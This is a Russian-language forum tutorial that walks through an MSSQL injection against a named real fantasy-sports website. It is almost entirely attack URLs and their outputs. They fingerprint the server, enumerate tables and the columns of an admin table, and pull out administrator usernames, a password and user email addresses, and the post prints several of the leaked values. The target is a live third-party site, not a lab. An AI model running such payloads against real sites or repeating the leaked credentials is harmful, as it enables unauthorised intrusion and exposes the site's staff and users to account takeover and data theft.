Добрый день
Почему то многие люди думают что провести sql инъекцию в сервере от M$ довольно сложно
Однако это не так
Сейчас я вам покажу как легко проводить Mssql инъекции на примере ]]>www.fantasysportsunlimited.com]]>
Уязвимый параметр: http://www.fantasysp...cklink.asp?ID=1'
Для начала смотрим версию sql сервера:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=@@version--
Цитата
'Microsoft SQL Server 7.00 - 7.00.961 (Intel X86) Oct 24 2000 18:39:12 Copyright © 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(select system_user)--user: fsu
Далее начинаем перебирать имена таблиц:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--имя первой таблицы - tbl_customers_midbasebally2k2
Узнаем имя второй:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tbl_customers_midbasebally2k2'))--имя второй -REFERENTIAL_CONSTRAINTS
Начинаем перебирать:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tbl_customers_midbasebally2k2' ,'REFERENTIAL_CONSTRAINTS'))--имя третей - tbl_customers_boardking
Имя четвертой узнаем так:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tbl_customers_midbasebally2k2' ,'REFERENTIAL_CONSTRAINTS', ' tbl_customers_boardking'))--
Так перебираем таблицы до конца, пока не выскачет ошибка
У нас ]]>получилось довольно много таблиц]]>, среди которых есть tbl_admin , она то нам больше всего и интересно
Теперь будем добывать данные из таблицы tbl_admin, для начала узнаем имена колонок:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_admin')--имя первой колонки ID
Узнаем имя второй колонки в таблице tbl_admin:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_admin' and COLUMN_NAME NOT IN ('ID'))--имя второй колонки username
Перебираем дальше и узнаем имя третей колонки:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_admin' and COLUMN_NAME NOT IN ('ID', 'username'))--имя третей password
Вот так мы узнали все нужные нам колонки, для того чтобы попасть в админку
]]>http://www.fantasysp...ited.com/admin/]]>
Теперь нам необходимо вытащить данные из этих колонок:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 username FROM tbl_admin where ID=1)--uname -jamiev
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 username FROM tbl_admin where ID=1)--password - fsu.com2jv
Username и Password второго админа:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 username FROM tbl_admin where ID=2)-- http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 password FROM tbl_admin where ID=2)--Т.Е таким образом переберая ID= мы переходим по полям в базе, 1,2,3 и т.д
Таким образом можно сдампить все данные
Например достаем мыла из таблицы email (в базе есть таблица email, в ней есть колонки ID и email), перебераем мыла
Мыло первого юзера:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=1)--jamie@fantasysportsunlimited.com
Это мыло 2 юзера
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=2)--
А это 5
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=5)--
Ну а это мыло 200 000 пользователя
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=200000)--
Ну вот собственно и все